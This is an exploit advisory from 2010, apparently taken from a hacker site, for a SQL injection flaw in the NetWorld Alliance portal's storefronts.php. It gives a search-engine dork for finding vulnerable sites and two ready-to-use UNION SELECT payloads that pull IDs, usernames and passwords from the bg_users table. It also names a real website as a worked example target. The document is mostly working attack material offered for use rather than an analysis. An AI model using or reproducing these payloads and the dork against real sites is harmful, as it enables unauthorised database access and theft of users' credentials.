NetWorld Alliance portal SQL Injection Vulnerability
Posted on 26 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>NetWorld Alliance portal SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== NetWorld Alliance portal SQL Injection Vulnerability ==================================================== # * EDB-ID: # * CVE: # * OSVDB-ID: # * Author: Dr.0rYX and Cr3w-DZ # * Published: # * Verified: # * Exploit Code: # * Vulnerable App: # # **************************************************************************************************** # * _______ ___________.__ ___________ .__ * # * ____ _ \______\__ ___/| |__ _____ \_ _____/______|__| ____ _____ * # * / / /_ \_ __ | | | | ______ \__ | __) \_ __ |/ ___\__ * # * | | \_/ | /| | | Y /_____/ / __ \_| | | / \___ / __ \_ * # * |___| /\_____ /__| |____| |___| / (____ /\___ / |__| |__|\___ >____ / * # * / / / / / / / * # * .__ __ __ * # * ______ ____ ____ __ _________|__|/ |_ ___.__. _/ |_ ____ _____ _____ * # * / ___// __ \_/ ___| | \_ __ __< | | __/ __ \__ / * # * \___ \ ___/ \___| | /| | / || | \___ | | | ___/ / __ | Y Y * # * /____ >\___ >\___ >____/ |__| |__||__| / ____| |__| \___ >____ /__|_| / * # * / / / / / / / * # * Pr!v8 Expl0iT AND t00l ** * # * ALGERIAN HACKERS * # *********************************- NORTH-AFRICA SECURITY TEAM -************************************* # # [!] NetWorld Alliance portal SQL Injection Vulnerability # [!] Author : Dr.0rYX and Cr3w-DZ # [!] MAIL : vx3@hotmail.de<mailto:vx3@hotmail.de> & Cr3w@hotmail.de<mailto:Cr3w@hotmail.de> # # ***************************************************************************/ # # [ Software Information ] # # [+] Vendor : http://www.networldalliance.com/ # [+] script : NetWorld Alliance portal # [+] Download : http://www.networldalliance.com/contact (sell script ) # [+] Vulnerability : SQL injection # [+] Dork : inurl:"storefronts.php?sf_id==" # # **************************************************************************/ # [ Vulnerable File ] # # http://server/storefronts.php?sf_id=[N.A.S.T ] # # # [ Exploit 1 ] # # http://server/storefronts.php?sf_id=-1+and+1=0+Union+All+Select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users-- # # [ Exploit 2 ] # # http://server/storefronts.php?sf_id=-1+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users-- # # [ ExAMPLE ] # # http://kioskmarketplace.com/storefronts.php?sf_id=-1+union+all+select+1,concat%28id,0x3a,username,0x3a,password%29+from+bg_users-- # # [ GReet ] # # [+] :claw , exploit-db.com , ALL HACKERS MUSLIMS # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-26]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
